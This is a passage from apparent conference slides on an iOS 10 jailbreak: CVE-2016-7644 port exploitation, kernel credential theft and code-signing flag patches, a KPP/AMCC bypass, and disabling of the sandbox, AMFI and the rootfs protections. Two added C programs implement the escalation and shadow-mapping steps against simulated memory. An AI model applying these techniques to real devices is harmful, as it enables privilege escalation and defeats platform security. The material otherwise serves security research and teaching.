    • Don’t forget to prepare a stashed port (corresponding to portB) for every port we allocated
  • 40. CVE-2016-7644
    • Trigger the bug for each of the middle ports
    • Destroy the stashed ports
    • Eventually we’ve made the ipc_entries point at dangling port pointers
  • 41. CVE-2016-7644
    • Make the page reusable by other kinds of zones (currently it belongs to ipc_ports) to capture the kernel port
    • Here we use another technique to gain the kernel task port
  • 42. Fake ipc_port
    • Use the dangling ipc_ports to read or write ip_context
    • Overlap the zone we targeted using ool_ports
    • The ool_ports will be mistaken for ipc_port members
    • Source: “Through the mach portal”, ianbeer, https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
  • 43. CVE-2016-7644
    • We are aiming to get the kernel task port
    • The kernel task port is supposed to be allocated while bootstrapping the kernel, which probably puts it in the first page of ipc_ports
    • And we can get/set the ip_context of ipc_ports (with mach_port_{set|get}_context)
  • 44. CVE-2016-7644
    • Rewrite every ip_context of the dangling ipc_ports to addresses around the middle of the first ipc_ports page (this is the CORE technique of our jailbreak)
    • There is a kernelspace-to-userspace conversion function which converts a “port address” into a “port object”
    • Using this conversion, once the dangling ipc_ports’ ip_context has been rewritten to the address of the kernel task port, the overlapping ool_ports (their host_port) become the kernel_task port with some probability!
    • As a result, the ool_ports can be used for receiving the kernel_task port from userspace tasks. This enables our userspace task to manipulate kernel memory in any way!
  • 45. Process handling in xnu • Process handling implementation in xnu is similar to one in BSD • There is a great deal of benefits to compromise a couple of values in the exact structure
  • 46. Privilege Escalation • Most exploits in various platforms likely use this sort of technique • “proc” structure is provided by per process • “allproc” variable holds a single linked list for every process’s “proc” • Rewriting flags and credentials inside “proc” structure!
  • 47. “proc” structure
    struct proc {
        LIST_ENTRY(proc) p_list;      /* List of all processes. */
        pid_t            p_pid;       /* Process identifier. (static) */
        void            *task;        /* corresponding task (static) */
        struct proc     *p_pptr;      /* Pointer to parent process. (LL) */
        pid_t            p_ppid;      /* process's parent pid number */
        pid_t            p_pgrpid;    /* process group id of the process (LL) */
        uid_t            p_uid;
        gid_t            p_gid;
        uid_t            p_ruid;
        .....
        kauth_cred_t     p_ucred;     /* Process owner's identity. (PUCL) */
        .....
        uint32_t         p_csflags;   /* flags for codesign (PL) */
        .....
  • At first glance one would just rewrite p_uid and p_gid • But those fields aren't what the kernel consults when it checks a process's identity • The real credential is the one referenced by p_ucred!
  • 48. “kauth_cred_t” • “typedef struct ucred *kauth_cred_t;” • The “ucred” structure is the real holder of a process's credentials • So what we do is copy the p_ucred of a highly privileged process (for example the kernel's own pid 0 proc) into our own proc
  • 49. p_csflags • Flags for codesign • A plain 32-bit bitfield • The bits are defined in bsd/sys/codesign.h • Setting or clearing individual bits turns checks on or off
  • 50. p_csflags • p_csflags |= CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW • These mark us as a platform binary with the installer and get-task-allow entitlements, which lets us get at another process's task • p_csflags &= ~(CS_RESTRICT | CS_KILL | CS_HARD) • Clearing these drops the enforcement options: CS_KILL (kill the process once its signature becomes invalid), CS_HARD (refuse to load invalid pages) and CS_RESTRICT (dyld treats the binary as restricted)
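Worked example, added here and not part of the talk: the allproc walk and the two patches from slides 48 to 50, written against a kernel read/write primitive of the kind the kernel task port provides. The kernel is simulated by a byte array so the code runs offline; the struct proc offsets, the allproc address and the credential pointers are assumptions made for that simulation and are not real kernel values, while the CS_* flag values are the ones from bsd/sys/codesign.h.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Flag values as defined in xnu's bsd/sys/codesign.h */
#define CS_VALID            0x00000001u
#define CS_GET_TASK_ALLOW   0x00000004u
#define CS_INSTALLER        0x00000008u
#define CS_HARD             0x00000100u
#define CS_KILL             0x00000200u
#define CS_RESTRICT         0x00000800u
#define CS_PLATFORM_BINARY  0x04000000u

/* Field offsets inside struct proc. ASSUMED values for the simulated
 * layout below; they are not the offsets of any real kernel build. */
#define OFF_P_LIST_NEXT  0x000   /* LIST_ENTRY(proc) p_list -> le_next */
#define OFF_P_PID        0x010   /* pid_t p_pid */
#define OFF_P_UCRED      0x100   /* kauth_cred_t p_ucred */
#define OFF_P_CSFLAGS    0x2a8   /* uint32_t p_csflags */
#define PROC_SIZE        0x300

/* Simulated kernel memory, pretending to live at KBASE (assumed address). */
#define KBASE   0xfffffff007000000ULL
#define ALLPROC (KBASE + 0x10)   /* assumed location of the allproc list head */
static uint8_t kmem[0x4000];

static uint8_t *kptr(uint64_t addr, size_t n) {
    if (addr < KBASE || addr - KBASE + n > sizeof kmem) {
        fprintf(stderr, "bad kernel address %#llx\n", (unsigned long long)addr);
        abort();
    }
    return kmem + (addr - KBASE);
}
/* These stand in for mach_vm_read()/mach_vm_write() on the kernel task port. */
static uint64_t kread64(uint64_t a)              { uint64_t v; memcpy(&v, kptr(a, 8), 8); return v; }
static uint32_t kread32(uint64_t a)              { uint32_t v; memcpy(&v, kptr(a, 4), 4); return v; }
static void     kwrite64(uint64_t a, uint64_t v) { memcpy(kptr(a, 8), &v, 8); }
static void     kwrite32(uint64_t a, uint32_t v) { memcpy(kptr(a, 4), &v, 4); }

/* Constructed sample: three procs chained from allproc, newest first (as
 * LIST_INSERT_HEAD leaves them): our sandboxed app -> launchd -> kernel. */
static void build_fake_kernel(void) {
    uint64_t kernproc = KBASE + 0x100, launchd = kernproc + PROC_SIZE, ours = launchd + PROC_SIZE;
    memset(kmem, 0, sizeof kmem);
    kwrite64(ALLPROC, ours);
    kwrite64(ours + OFF_P_LIST_NEXT, launchd);
    kwrite32(ours + OFF_P_PID, 1234);
    kwrite64(ours + OFF_P_UCRED, KBASE + 0x2000);      /* "mobile" ucred (fake address) */
    kwrite32(ours + OFF_P_CSFLAGS, CS_VALID | CS_HARD | CS_KILL | CS_RESTRICT);
    kwrite64(launchd + OFF_P_LIST_NEXT, kernproc);
    kwrite32(launchd + OFF_P_PID, 1);
    kwrite64(launchd + OFF_P_UCRED, KBASE + 0x2100);   /* root ucred (fake address) */
    kwrite64(kernproc + OFF_P_LIST_NEXT, 0);           /* end of list */
    kwrite32(kernproc + OFF_P_PID, 0);
    kwrite64(kernproc + OFF_P_UCRED, KBASE + 0x2200);  /* kernel ucred (fake address) */
}

/* Walk the allproc chain through le_next until p_pid matches; 0 if absent. */
static uint64_t find_proc(int pid) {
    uint64_t p = kread64(ALLPROC);
    for (int guard = 0; p != 0 && guard < 4096; guard++) {
        if ((int)kread32(p + OFF_P_PID) == pid) return p;
        p = kread64(p + OFF_P_LIST_NEXT);
    }
    return 0;
}
static uint64_t proc_ucred(int pid)   { uint64_t p = find_proc(pid); return p ? kread64(p + OFF_P_UCRED) : 0; }
static uint32_t proc_csflags(int pid) { uint64_t p = find_proc(pid); return p ? kread32(p + OFF_P_CSFLAGS) : 0; }

/* Give `pid` the kernel's credential and relax its code-signing flags (slides 48-50).
 * A real exploit also has to keep the shared ucred's reference count consistent;
 * that bookkeeping is left out here. Returns 0 on success, -1 if a proc is missing. */
static int escalate(int pid) {
    uint64_t kernproc = find_proc(0), target = find_proc(pid);
    if (!kernproc || !target) return -1;
    kwrite64(target + OFF_P_UCRED, kread64(kernproc + OFF_P_UCRED));
    uint32_t f = kread32(target + OFF_P_CSFLAGS);
    f |= CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW;
    f &= ~(CS_RESTRICT | CS_KILL | CS_HARD);
    kwrite32(target + OFF_P_CSFLAGS, f);
    return 0;
}

int main(void) {
    build_fake_kernel();
    printf("before: ucred=%#llx csflags=%#x\n", (unsigned long long)proc_ucred(1234), proc_csflags(1234));
    if (escalate(1234) != 0) return 1;
    printf("after:  ucred=%#llx csflags=%#x\n", (unsigned long long)proc_ucred(1234), proc_csflags(1234));
    return 0;
}
```

On a real device the four k* helpers are the only part that changes: they become mach_vm_read/mach_vm_write calls on the port obtained in slide 44, and the offsets have to match the running kernel build.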
  • 51. AMCC • It was called KPP (Kernel Patch Protection) until recently; on newer SoCs the same role is taken over in hardware by KTRR, enforced by the AMCC memory controller, and this talk uses the names KPP, KTRR and AMCC interchangeably • The most annoying mitigation for jailbreakers • Built on ARM's TrustZone (EL3) • As of xnu-4570.1.46 it is partially open-sourced (there seems to be no sync_handler implementation in the release)
  • 52. AMCC • ARMv8 defines four exception levels, and EL3 is where TrustZone's secure monitor runs • EL0 - user-space programs run here • EL1 - the kernel (and iBoot, the bootloader) • EL2 - hypervisor level, unused in iOS • EL3 - the KPP monitor (AMCC/KTRR in this talk's naming)
  • 53. AMCC • The strategy: kernel regions mapped read-only or read/execute-only are guaranteed to stay unmodified • If a check finds such a region altered, the monitor panics the kernel • Our goal is to get around the region-checking loop so that we can write anywhere
  • 54. AMCC • In theory it cannot be avoided • In practice it can • Let's descend into the ARM abyss!
  • 55. AMCC • The monitor reads several system registers to learn the state of kernel space and user space • We can set those registers once we have kernel code execution
  • 56. System Registers • TTBR1_EL1 holds the base address of translation table 1, the table used for the upper (kernel) half of the address space • CPACR_EL1 controls access to floating-point and Advanced SIMD (NEON) functionality from EL0 and EL1 • Its CPACR_EL1.FPEN field decides whether FP/SIMD instructions trap
  • 57. The loop • EL0 executes an FPU instruction → the trap lands in EL3, which executes sync_handler • EL0 or EL1 takes an IRQ → EL3 executes the Watchtower • The two alternate: the Watchtower re-arms the FPU trap, so the next FPU instruction re-enters sync_handler
  • 58. sync_handler • The core of AMCC • It is presumed to check the integrity of the KTRR regions and of the system registers • If it finds modified pages it triggers a kernel panic • Before returning it sets CPACR_EL1 so that FPU instructions no longer trap
  • 59. Watchtower • It runs on IRQ delivery • Its source lives in osfmk/arm64/locore.s • It restores a number of registers and resets CPACR_EL1 so that FP/SIMD instructions from EL0 and EL1 trap again
  • 60. The solution • Taken from @qwertyoruiopz's Yalu102 jailbreak • 1st, load a dummy translation table base address into TTBR1_EL1 • 2nd, write CPACR_EL1 so that EL3 stops trapping (but this triggers the EL3 check now, while the dummy table is in place) • 3rd, load the fake translation table base address into TTBR1_EL1 • 4th, execute “tlbi vmalle1” to invalidate all stage-1 translations • And patch the kernel instruction that touches CPACR to a nop
  • 61. The solution • The code is below
  • 62. Shadowmapping technique • gVirtbase - virtual address of the translation table entries • gPhybase - physical address of the translation table entries • Both are stored in the pmap structure • The technique replaces the original Translation Table Entries with our own fake Translation Table Entries, which gives us write permission on executable pages
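Added illustration of the shadow-mapping idea, written for this page and not taken from yalu102: on a simulated ARMv8 4 KB-granule stage-1 table, the table path for a kernel VA is cloned into fresh pages and the cloned leaf becomes a fake TTE that points at a writable copy of the page, so the original tables and the protected page are never written. Assumptions: a 39-bit VA space walked from level 1, page mappings only (no block descriptors), all addresses simulated, and an invented kernel VA; copying the data page is this example's way of keeping the original physical page pristine and is not necessarily how the real bypass arranged it.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)
#define NPAGES     16                    /* simulated physical memory: 16 x 4 KB */
static uint64_t pmem[NPAGES][PAGE_SIZE / 8];
static int next_free;                    /* bump allocator; PA = page index << 12 */

/* Stage-1 descriptor bits, 4 KB granule (ARMv8-A VMSA) */
#define D_VALID   (1ULL << 0)
#define D_TABLE   (1ULL << 1)            /* next-level table at L1/L2, page at L3 */
#define D_AP_RO   (1ULL << 7)            /* AP[2]: read-only (AP[1], bit 6, is EL0 access) */
#define D_AF      (1ULL << 10)           /* access flag */
#define D_UXN     (1ULL << 54)           /* unprivileged execute-never (PXN is bit 53) */
#define D_OA_MASK 0x0000fffffffff000ULL  /* output address, bits [47:12] */

/* Assumption: 39-bit VA space (T1SZ = 25), walk starts at level 1,
 * 9 index bits per level: L1 = VA[38:30], L2 = VA[29:21], L3 = VA[20:12]. */
static unsigned tt_index(uint64_t va, int level) { return (unsigned)((va >> (PAGE_SHIFT + 9 * (3 - level))) & 0x1ff); }
static uint64_t *table_at(uint64_t pa) { return pmem[pa >> PAGE_SHIFT]; }
static uint8_t  *bytes_at(uint64_t pa) { return (uint8_t *)pmem[pa >> PAGE_SHIFT] + (pa & (PAGE_SIZE - 1)); }
static uint64_t alloc_page(void) {
    if (next_free >= NPAGES) { fputs("out of simulated memory\n", stderr); abort(); }
    memset(pmem[next_free], 0, PAGE_SIZE);
    return (uint64_t)next_free++ << PAGE_SHIFT;
}

/* Translate va through the tables rooted at ttbr. Returns the PA or UINT64_MAX
 * on a translation fault; *leaf (if non-NULL) receives the L3 descriptor. */
static uint64_t walk(uint64_t ttbr, uint64_t va, uint64_t *leaf) {
    uint64_t tbl = ttbr & D_OA_MASK;
    for (int level = 1; level <= 3; level++) {
        uint64_t d = table_at(tbl)[tt_index(va, level)];
        if ((d & (D_VALID | D_TABLE)) != (D_VALID | D_TABLE)) return UINT64_MAX; /* no block mappings here */
        if (level == 3) { if (leaf) *leaf = d; return (d & D_OA_MASK) | (va & (PAGE_SIZE - 1)); }
        tbl = d & D_OA_MASK;
    }
    return UINT64_MAX;
}
static int el1_writable(uint64_t leaf) { return (leaf & D_AP_RO) == 0; }

/* Map the 4 KB page va -> pa with the given attribute bits, allocating tables on the way. */
static void map_page(uint64_t ttbr, uint64_t va, uint64_t pa, uint64_t attrs) {
    uint64_t tbl = ttbr & D_OA_MASK;
    for (int level = 1; level < 3; level++) {
        uint64_t *e = &table_at(tbl)[tt_index(va, level)];
        if (!(*e & D_VALID)) *e = alloc_page() | D_VALID | D_TABLE;
        tbl = *e & D_OA_MASK;
    }
    table_at(tbl)[tt_index(va, 3)] = (pa & D_OA_MASK) | D_VALID | D_TABLE | D_AF | attrs;
}

/* Shadow mapping: clone the table path for va into fresh pages (the original tables and
 * the protected page are never written), copy the target page, and turn the cloned L3
 * entry into a fake TTE pointing at the copy with AP[2] cleared, i.e. writable at EL1.
 * Execute-never bits are left as they were. Returns the new table base. */
static uint64_t shadow_map(uint64_t ttbr, uint64_t va) {
    uint64_t src = ttbr & D_OA_MASK, dst = alloc_page(), new_ttbr = dst;
    for (int level = 1; level <= 3; level++) {
        memcpy(table_at(dst), table_at(src), PAGE_SIZE);
        uint64_t *e = &table_at(dst)[tt_index(va, level)];
        if (!(*e & D_VALID)) return UINT64_MAX;
        if (level == 3) {
            uint64_t copy = alloc_page();
            memcpy(table_at(copy), table_at(*e & D_OA_MASK), PAGE_SIZE);
            *e = (*e & ~(D_OA_MASK | D_AP_RO)) | copy;
        } else {
            src = *e & D_OA_MASK;
            dst = alloc_page();
            *e = (*e & ~D_OA_MASK) | dst;
        }
    }
    return new_ttbr;
}

/* Patch one instruction at va if the mapping allows writes (-1 otherwise), and read one back. */
static int write_insn(uint64_t ttbr, uint64_t va, uint32_t insn) {
    uint64_t leaf, pa = walk(ttbr, va, &leaf);
    if (pa == UINT64_MAX || !el1_writable(leaf)) return -1;
    memcpy(bytes_at(pa), &insn, 4);
    return 0;
}
static uint32_t read_insn(uint64_t ttbr, uint64_t va) {
    uint32_t insn = 0; uint64_t pa = walk(ttbr, va, NULL);
    if (pa != UINT64_MAX) memcpy(&insn, bytes_at(pa), 4);
    return insn;
}

/* Constructed scene: a page of "kernel text" (all NOPs) mapped read-only and kernel-executable
 * at an assumed kernel VA. Returns the L1 table base, i.e. the value TTBR1_EL1 would hold. */
#define KTEXT_VA 0xffffffe000004000ULL
#define A64_NOP  0xd503201fu
static uint64_t build_scene(void) {
    next_free = 0;
    uint64_t ttbr1 = alloc_page();
    uint64_t text = alloc_page();
    for (uint64_t off = 0; off < PAGE_SIZE; off += 4) { uint32_t n = A64_NOP; memcpy(bytes_at(text + off), &n, 4); }
    map_page(ttbr1, KTEXT_VA, text, D_AP_RO | D_UXN);
    return ttbr1;
}

int main(void) {
    uint64_t ttbr1 = build_scene();
    uint64_t shadow = shadow_map(ttbr1, KTEXT_VA);
    printf("write via original table: %d, via shadow table: %d\n",
           write_insn(ttbr1, KTEXT_VA, 0xd2800000u), write_insn(shadow, KTEXT_VA, 0xd2800000u));
    printf("insn via shadow: %#x, via original (untouched): %#x\n", read_insn(shadow, KTEXT_VA), read_insn(ttbr1, KTEXT_VA));
    return 0;
}
```

On hardware, loading the returned base into TTBR1_EL1 and issuing the “tlbi vmalle1” from slide 60 is what makes the fake entries take effect; here the two table bases are simply walked side by side to show that the patch is visible through the shadow table only.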
  • 63. Problem • TTBR1_EL1 is reset to 0 on sleep • There are two kinds of sleep • Idle sleep: entered when the CPU is idle • Deep sleep: entered when the screen has been black for more than 30 seconds • Their state is stored in “struct cpu_data->interrupt_handler”
  • 64. AMFI • Apple Mobile File Integrity • Exists as a daemon (amfid) and a kext • Attackers target it because the kext audits a binary's entitlements, code signature and MAC (Mandatory Access Control) policy
  • 65. PE_i_can_has_debugger • Patch the function so that it always returns true • With it returning true, many checks in the kernel switch off
  • 66. Disabling sandbox • The Sandbox registers its MAC policy hooks in “mac_policy_conf->mpc_ops” (a struct mac_policy_ops) • Those hooks need to be disabled for the jailbreak • Just overwrite the hook pointers with NULL
  • 67. LwVM • Light-weight Volume Manager • LwVM wraps GPT • _mapForIO intercepts writes to the root partition • The partition object, kept on the heap, carries a flag marking it locked • Clearing that flag lets us write anywhere in the root partition
  • 68. Remount rootfs • mac_mount prevents remounting the root partition read/write • Bypassing it works the same way as for LwVM • The vnode (checked on every mount) carries a flag • Clear that flag and remount the root partition
  • 69. References • “Through the mach portal” (Ian Beer) • yalu102 (Luca Todesco) • “iOS 10 Kernel Heap Revisited” (Stefan Esser) • “Mac OS X and iOS Internals” (Jonathan Levin)